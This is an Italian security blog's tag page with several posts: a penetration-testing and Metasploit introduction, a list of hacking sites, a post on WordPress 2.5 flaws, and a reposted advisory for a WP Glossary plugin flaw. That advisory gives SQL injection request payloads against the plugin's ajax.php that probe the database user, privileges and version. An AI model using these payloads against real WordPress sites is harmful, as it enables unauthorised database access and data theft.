Articoli con tag Exploit

Le basi del Penetration Test – Metasploit framework.

0
2 mesi fa
Scritto da Rocco Musolino in , , ,

Il penetration testing, spesso chiamato semplicemente pentesting o security testing, è la pratica di attaccare i sistemi propri, o dei propri clienti, nello stesso modo in cui un hacker lo farebbe, per scovare falle nei sistemi o buchi nella sicurezza. Certamente, lo si fa senza l’intenzione di danneggiare l’intero network di lavoro.

La persona che sovlge il Penetration test è chiamato Penetration Tester o in gergo, Pentester.

Chiariamo una cosa: I Penetration test richiedono apposite autorizzazioni da parte del proprietario dei sistemi informatici in esame. In caso contrario, voi state hackerando il sistema, ed è considerata una pratica illegale in molti paesi. E fidatevi, non state bene con una divisa arancione addosso.

In altre parole: La differenza tra il Penetration testing e l’hacking sta nei permessi, nel primo caso siete autorizzati a farlo (con un permesso scritto!), e persino pagati. Nel secondo caso è una vostra iniziativa, considerata illegale.

Potete diventare dei pentester anche a casa, facendo esperienza con un vostro server locale, per poi iniziare a far esperienza all’infuori delle mura domestiche.
Dunque per iniziare, consiglio a tutti la lettura di questo breve e-book, che introduce a quello che è la base di un pentester, quindi la conoscenze di exploit, payload e determinati framework.

Un piccolo video dimostrazione sull’utilizzo del framework Metasploit:

Nuovo Exploit sfrutta un bug di WP Glossary

0
3 mesi fa
Scritto da Rocco Musolino in ,

In data 30/10/2011 un nuovo bug è stato riscontrato nel Plug-in per WordPress: WP Glossary.
Attraverso una vulnerabilità di tipo SQL Injection e l’exploit qui sotto riportato (è consigliato l’utilizzo di tool come SQLMAP), è possibile sfruttare tale vulnerabilità.
E’ consigliabile dunque aggiornare il plug-in.

######################################################
# Exploit Title: WordPress WP Glossary plugin SQL Injection Vulnerability
# Date: 2011-30-10
# Author: longrifle0x
# software: Wordpress
# Download: http://wordpress.org/extend/plugins/wp-glossary/
# Tools: SQLMAP
######################################################
 
*DESCRIPTIONDiscovered a vulnerability in WP Glossary, Wordpress Plugin,
vulnerability is SQL injection.
File: wp-content/plugins/wp-glossary/ajax.php
Exploit: id=-1; or 1=if
 
*Exploitation*
http://localhost:80/wp-content/plugins/wp-glossary/ajax.php
 [GET][id=-1][CURRENT_USER()
http://localhost:80/wp-content/plugins/wp-glossary/ajax.php
 [GET][id=-1][SELECT
(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT
0,1)='Y') THEN 1 ELSE 0 END)
http://localhost:80/
wp-content/plugins/wp-glossary/ajax.php [GET][id=-1][MID((VERSION()),1,6)
 
 
***Greetz: Georgian Underground Community***

Siti hacker da seguire.

0
1 anno fa
Scritto da Rocco Musolino in , ,

Come lessi tempo fa in un libro di sicurezza informatica, “hacker si nasce e si diventa!”, purtroppo non basta avere la curiosità e quella flessibilità mentale che contraddistingue un pirata informatico, bisogna anche studiare, apprendere svariati concetti, e impegnarsi in ciò che si fa.. ;)

Qui di seguito riporto alcuni siti che possono aiutare in questo cammino e che io personalmente ritengo molto interessanti:

  • http://www.hackerstribe.com ( Va bene dai sono modesto :) )
  • http://www.pillolhacking.com (Il blog dell’amico Angelo Righi, che ritengo personalmente molto interessante)
  • http://inj3ct0r.com/
  • http://www.html.it (Non poteva mancare, la programmazione è alla base dell’hacking)
  • http://kipkay.com/ (La dimostrazione che un hacker non sta solo dietro il PC)
  • http://www.backtrack.it (Il sito della distro pentester per eccellenza)
  • http://www.exploit-db.com/ (Per chi già è allo stato “avanzato”, exploit etc..)
  • http://www.md5decrypter.co.uk/ (Può tornare utile per decriptare chiavi md5)
  • http://www.lifehacker.com
  • http://www.google.com (Ovviamente non poteva mancare, google è l’arma segreta!)

    • Fatene buon uso, commentate e segnalatene di nuovi e interessanti! ;)

    2 exploit per WordPress 2.5

    0
    3 anni fa
    Scritto da Rocco Musolino in , , ,

    techjam.itWordpress 2.5

    Aggiornare o non aggiornare… Passare alla 2.5 oppure aspettare la 2.5.1?Il dilemma è veramente enorme tuttavia molti di noi si sono lasciati trasportare dalle novità grafiche e funzionali di WordPress 2.5.

    Oggi vi voglio segnalare tuttavia due exploit presenti in WordPress 2.5 (anche se ce n’è uno pure in WordPress 2.3.3). Il primo consente all’utenza senza i diritti di creare altri utenti, di crearli. Il secondo è definito un “multiple SQL injection”: dal form del commento è possibile inserire codice malevolo, prendere e modificare dati direttamente all’interno del database.

    Andiamo ora nel dettaglio degli errori di WordPress 2.5.

    Come è noto, WordPress 2.5 ha alcuni gravi errori nel sistema di upload dei file multimediali ed alcune incompatibilità con IE 7. Se questo non bastava a rilasciare la 2.5.1, credo che un bug critical lo sia.

    A distanza di poche ore dal rilascio ufficiale di WordPress 2.5, è stato rilevato una falla di sicurezza indicata come “critical”. Un utente registrato su WordPress che non ha permessi per modificare gli altri utenti può creare un nuovo utente. Per fortuna qualche utente ha già provveduto a correggere l’errore.

    La seconda falla credo sia da considerare a livello “super critical” infatti un visitatore potrebbe accedere DIRETTAMENTE al database SQL estraendo dati sensibili oppure modificandoli.

    Le falle sono chiaramente molto gravi.

    Ovviamente tutto questo pone anche una domanda agli utilizzatori di WordPress 2.5: perchè il team WordPress attende per il rilascio della patch? La mia ipotesi è che non voglia creare allarmismi oppure farsi una brutta “fama”. Ultimamente c’è una gara a chi rilascia prima la nuova versione “stabile” del CMS, quasi tutti questi, a causa di uno scarso test pre-rilascio, finiscono per avere una patch di sicurezza nei giorni successivi al rilascio. Penso che Worpdress.org lo voglia evitare.

    Ma è giusto tutto ciò? Secondo me assolutamente no quindi consiglio a coloro che leggono questo articolo di diffondere il problema e diffondere la patch che ho incluso.

    Patch:

    Download HERE

    Ricordo a tutti che questa patch risolve tutti i problemi di alto livello riscontrati e corretti fino ad ora su WordPress 2.5 ma non risolve la seconda falla, dato che non ho ulteriori informazioni per analizzarla.

    Per l’installazione potete sostituire senza paura tutti i files. Le correzioni sono ufficiali

    Grazie a tutti.

    Torna all'inizio